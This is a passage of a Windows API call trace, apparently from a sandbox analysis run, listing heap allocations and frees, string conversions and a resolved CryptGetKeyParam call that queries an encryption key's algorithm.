(HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0082.792] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0082.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0082.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ca0 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb4b0 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0082.793] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.794] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0082.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0082.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.795] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0082.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0418 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35c0 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3740 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0082.796] PeekMessageW (in: lpMsg=0x144d8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144d8e4) returned 0 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2eb0 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2eb0 | out: hHeap=0x1780000) returned 1 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36c8 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35d8 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36e0 [0082.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c35f0 [0082.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0082.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0082.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3710 [0082.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.811] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.811] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0082.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.812] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0468 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2e80 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0082.812] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e80 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0468 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ed0 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d70 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dc0 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ee0 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e40 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ef0 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d90 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d30 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d80 | out: hHeap=0x1780000) returned 1 [0082.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0082.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0082.815] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0508 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f00 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2de0 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e50 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0350 | out: hHeap=0x1780000) returned 1 [0082.815] CryptGetKeyParam (in: hKey=0x41ac040, dwParam=0x7, pbData=0x43e2b50, pdwDataLen=0x144d900, dwFlags=0x0 | out: pbData=0x43e2b50*=0x6610, pdwDataLen=0x144d900*=0x4) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2dd0 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d50 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3b60 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2f20 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3950 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ec0 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a40 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3998 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e30 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38f0 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c38c0 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e70 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3a28 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e00 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e90 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e20 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ee0 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2e10 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35c0 | out: hHeap=0x1780000) returned 1 [0082.816] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36e0 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35f0 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0082.817] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 